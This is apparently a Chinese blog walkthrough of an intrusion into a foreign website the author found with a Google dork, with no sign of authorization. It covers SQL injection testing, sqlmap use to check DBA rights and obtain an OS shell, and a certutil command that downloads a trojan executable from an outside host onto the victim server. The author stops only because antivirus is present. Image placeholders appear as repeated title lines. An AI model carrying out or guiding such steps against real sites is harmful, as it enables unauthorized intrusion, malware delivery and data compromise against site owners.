一次半成功的滲透測試

0x00:尋找漏洞點

某天閒著無聊用谷歌語法inurl:aspx?id=找到一個國外的某個站點。功能點比較簡單隻有一個User ID:

一次半成功的滲透測試

0x01:檢測功能點

由於只有搜尋框我們先來一個單引號看他是否報錯報。

一次半成功的滲透測試

我們發現報錯了單引號,我們再來一個單引號測試一下看看能不能回顯,頁面正常。

一次半成功的滲透測試

我們發現隨便輸入點內容網站回顯正常提示xxxx。說明有可能存在sql注入,我們繼續往下看。

一次半成功的滲透測試

0x02:資訊收集

這裡利用火狐瀏覽器的Wappalyzer外掛看了一下網站資訊。IIS版本為7。5有檔案上傳IIS解析漏洞。

一次半成功的滲透測試

下面是用線上網站探查到的埠情況,還開一個1433埠。

一次半成功的滲透測試

0x03:Burp抓包+sqlmap檢測

既然剛才前面的輸入框會引起報錯有可能存在sql注入那我是否可以考慮抓個數據包放到sqlmap裡面跑跑看能不能跑出一些關鍵資訊。下面利用Burp抓到包然後儲存為x。txt。這裡們加*號就是指定注入點。

一次半成功的滲透測試

放到sqlmap裡面,已經提示可以注入。

一次半成功的滲透測試

我們繼續往下看,下面是注入點。

一次半成功的滲透測試

有堆疊注入我們看看堆疊可以直接sqlmap ——is-dba 看看是不是管理員許可權如果我們可以利用sqlmap –-os-shelll 直接寫入木馬 拿到webshell或者反彈shell直接

這裡看到dba的許可權為True代表有機會寫入一句話從而獲取到也給低許可權的shell。

一次半成功的滲透測試

這裡可以直接sqlmap –os-shell,當出現os-shell的時候代表成功。

一次半成功的滲透測試

我們輸入一條ipconfig簡單命令看看能不能執行成功。然後判斷目標是否出網!如果不出網那傳木馬上去就扯犢子了,可以選擇傳webshell。

我們可以看到命令可以執行

一次半成功的滲透測試

接下可以使用certutil。exe去接收一個惡意的檔案。

命令certutil。exe -urlcache -

split

-f http:

//192。168。163。128:8080/artifact。exe c:\artifact。exe // c:\artifact。exe是儲存路徑

這條命令遠端下載檔案木馬儲存到受害機上去

先檢視一下當前的程序。

一次半成功的滲透測試

然後使用線上的防毒識別。結果發現還真有防護,就此放棄……

一次半成功的滲透測試